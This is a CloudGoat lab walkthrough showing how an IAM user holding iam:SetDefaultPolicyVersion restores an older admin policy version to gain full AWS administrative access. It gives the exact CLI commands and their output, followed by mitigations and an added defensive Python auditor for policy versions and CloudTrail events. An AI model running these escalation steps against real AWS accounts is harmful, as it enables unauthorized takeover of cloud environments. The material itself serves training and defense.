Cloudgoat-Iam_Privesc_by_Rollback

CloudGoat IAM Privilege Escalation by Rollback - Complete Walkthrough

In this walkthrough, we’ll explore the CloudGoat scenario “iam_privesc_by_rollback”, which demonstrates how attackers can abuse IAM policy versioning to escalate privileges in AWS environments. The scenario shows how an earlier policy version that still carries elevated permissions can be restored, using only the SetDefaultPolicyVersion permission, to obtain administrative access.

Initial Setup

Begin by configuring CloudGoat and whitelisting your IP address to ensure proper connectivity to the AWS environment.

cloudgoat config whitelist --auto

Create the IAM privilege escalation scenario using the following command:

cloudgoat create iam_privesc_by_rollback

Upon successful deployment, you’ll receive initial AWS credentials for the scenario:

raynor_access_key_id = AKIAQ************
raynor_secret_access_key = +ztS4/****************

Reconnaissance and Enumeration

The first step in any AWS penetration test involves thorough enumeration to understand available permissions and resources. Using automated enumeration tools can significantly speed up this process (AWS_enum).

python3 aws_auditor.py

The enumeration reveals an attached IAM policy with specific permissions:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "IAMPrivilegeEscalationByRollback",
      "Effect": "Allow",
      "Action": [
        "iam:Get*",
        "iam:List*",
        "iam:SetDefaultPolicyVersion"
      ],
      "Resource": "*"
    }
  ]
}

Policy Version Analysis

The key to this privilege escalation lies in examining policy versions. A managed policy keeps up to five versions, and only the default one is enforced; a principal holding iam:SetDefaultPolicyVersion can promote any retained version, so this permission combined with read access (to inspect what each version grants) points to a policy rollback attack.

List all available policy versions:

aws iam list-policy-versions --policy-arn arn:aws:iam::ACCOUNT:policy/POLICY-NAME --profile init

This command reveals multiple policy versions:

{
  "Versions": [
    {
      "VersionId": "v5",
      "IsDefaultVersion": false,
      "CreateDate": "2025-05-24T21:58:04+00:00"
    },
    {
      "VersionId": "v4",
      "IsDefaultVersion": false,
      "CreateDate": "2025-05-24T21:57:58+00:00"
    },
    {
      "VersionId": "v3",
      "IsDefaultVersion": false,
      "CreateDate": "2025-05-24T21:57:52+00:00"
    },
    {
      "VersionId": "v2",
      "IsDefaultVersion": false,
      "CreateDate": "2025-05-24T21:57:45+00:00"
    },
    {
      "VersionId": "v1",
      "IsDefaultVersion": true,
      "CreateDate": "2025-05-24T21:57:39+00:00"
    }
  ]
}

Exploitation

Examine each policy version to identify versions with elevated privileges. Version 3 contains the administrative permissions we’re looking for:

aws iam get-policy-version --policy-arn arn:aws:iam::ACCOUNT:policy/POLICY-NAME --version-id v3 --profile init

The policy version reveals full administrative access:

{
  "PolicyVersion": {
    "Document": {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Action": "*",
          "Effect": "Allow",
          "Resource": "*"
        }
      ]
    },
    "VersionId": "v3",
    "IsDefaultVersion": false,
    "CreateDate": "2025-05-24T22:08:15+00:00"
  }
}

Execute the privilege escalation by setting the administrative policy version as default:

aws iam set-default-policy-version \
  --policy-arn arn:aws:iam::ACCOUNT:policy/POLICY-NAME \
  --version-id v3 \
  --profile init

The new release of AWS_enum now also handles managed policy versioning, so the non-default versions above are enumerated automatically.

Impact and Verification

After successfully rolling back to the administrative policy version, you now possess full AWS administrative privileges. This escalation allows complete control over the AWS environment, including the ability to create new users, modify existing policies, access sensitive resources, and perform any administrative action.

Mitigation Strategies

Organizations should implement several controls to prevent IAM privilege escalation through policy rollback:

  • Policy Version Management: Regularly audit and remove unnecessary policy versions, especially those containing elevated privileges
  • Least Privilege Principle: Avoid granting iam:SetDefaultPolicyVersion permission unless absolutely necessary
  • Monitoring and Alerting: Implement CloudTrail monitoring for policy version changes and privilege escalation activities
  • Access Reviews: Conduct regular reviews of IAM policies and their version histories
  • Automation: Use infrastructure as code to maintain consistent policy configurations
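The following is an added example (not part of the walkthrough or of CloudGoat/AWS_enum) that turns the version analysis and the mitigation bullets above into checks a defender can run: it audits a policy's version history for retained versions that grant more than the default, flags the case where the default also grants iam:SetDefaultPolicyVersion, and picks the corresponding CloudTrail calls out of a record set. The policy, account id and CloudTrail record are constructed inline in the shape of the CLI output shown above; in practice you would feed it the output of list-policy-versions and get-policy-version.

```python
import fnmatch
# Constructed sample in the shape of list-policy-versions / get-policy-version
# output: v1 (default) is read-only plus SetDefaultPolicyVersion, v3 is full
# admin. Account id and policy name are placeholders, not values from the page.
SAMPLE_POLICY = {
    "PolicyArn": "arn:aws:iam::123456789012:policy/EXAMPLE-POLICY",
    "Versions": {
        "v1": {"IsDefaultVersion": True, "Document": {"Statement": [
            {"Effect": "Allow", "Resource": "*",
             "Action": ["iam:Get*", "iam:List*", "iam:SetDefaultPolicyVersion"]}]}},
        "v2": {"IsDefaultVersion": False, "Document": {"Statement": [
            {"Effect": "Allow", "Action": "iam:ListUsers", "Resource": "*"}]}},
        "v3": {"IsDefaultVersion": False, "Document": {"Statement": [
            {"Effect": "Allow", "Action": "*", "Resource": "*"}]}},
    },
}
# Constructed CloudTrail record of the call a rollback escalation produces.
SAMPLE_EVENTS = [{"eventSource": "iam.amazonaws.com", "eventName": "SetDefaultPolicyVersion",
                  "userIdentity": {"userName": "raynor"},
                  "requestParameters": {"policyArn": SAMPLE_POLICY["PolicyArn"], "versionId": "v3"}}]

def allowed_actions(document):
    """Collect actions from Allow statements (Action may be a string or a list)."""
    actions = set()
    for stmt in document.get("Statement", []):
        if stmt.get("Effect") == "Allow":
            act = stmt.get("Action", [])
            actions.update([act] if isinstance(act, str) else act)
    return actions

def grants(patterns, action):
    """True if a granted pattern such as 'iam:List*' or '*' covers `action`."""
    return any(fnmatch.fnmatchcase(action, p) for p in patterns)

def rollback_exposure(policy):
    """List non-default versions allowing something the default does not; mark
    'exploitable' when the default itself grants iam:SetDefaultPolicyVersion."""
    versions = policy["Versions"]
    base = allowed_actions(next(v["Document"] for v in versions.values()
                                if v["IsDefaultVersion"]))
    wider = [vid for vid, v in versions.items() if not v["IsDefaultVersion"]
             and any(not grants(base, a) for a in allowed_actions(v["Document"]))]
    return {"versions": wider,
            "exploitable": bool(wider) and grants(base, "iam:SetDefaultPolicyVersion")}

def rollback_events(records):
    """Return (user, policyArn, versionId) for each SetDefaultPolicyVersion call."""
    return [(r["userIdentity"].get("userName", "?"), r["requestParameters"]["policyArn"],
             r["requestParameters"]["versionId"]) for r in records
            if r.get("eventSource") == "iam.amazonaws.com" and r.get("eventName") == "SetDefaultPolicyVersion"]
```

Note that v2 is not reported because iam:ListUsers is already covered by the default's iam:List* pattern; only versions that widen access beyond the default are worth deleting or alerting on.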